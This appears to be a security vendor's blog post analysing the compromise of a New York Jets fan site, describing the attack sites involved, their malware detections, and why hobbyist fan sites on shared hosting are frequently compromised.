Earlier on this morning I read a post on the TrendLabs blog describing how the New York Jets fan site has been compromised. I fed the URL into our automation systems and confirmed the malicious content – in fact 3 attack sites are used:
- an iframe loading malicious content from an Estonian site. This attack site appears to be returning some errors now, but historically (back in Nov 2007) we have seen it being used to install Mal/EncPk-AW using the usual cocktail of browser exploits.
- the Estonian site also loads contents from another attack site hosted with a porn site. At the time of testing this attack site is only serving up a 404 error. This attack site appears to have been created using a known kit (‘FirePack’) – numerous other attack sites using the same kit have been seen by SophosLabs.
- the compromised New York Jets page also contains a malicious script (pro-actively detected as Mal/ObfJS-A) which attempts to load content from yet another attack site. This one is well known to SophosLabs – known about and blocked since Oct 2007.
The case got me thinking about other fan sites SophosLabs have come across recently. The evidence does not point to such sites being specifically targeted because of their content. Instead, I suspect they have been hit thanks to some of the characteristics they commonly share:
- typically created and supported by hobbyists, so frequently hosted in cheap server farms, where if a single server gets compromised, hundreds of sites can be affected.
- sites commonly use publicly available blogging tools to manage content. Vulnerabilities in such tools will be specifically targeted by hackers in order to potentially attack large numbers of sites.
When such sites get compromised, it can be a big win for the hackers. Looking through our data for the past couple of weeks, I pulled out two football related fan sites. Alexa data for these sites shows a high traffic ranking for each, with significant numbers of visitors (just over 1 and 3 million for each over a 3 month period).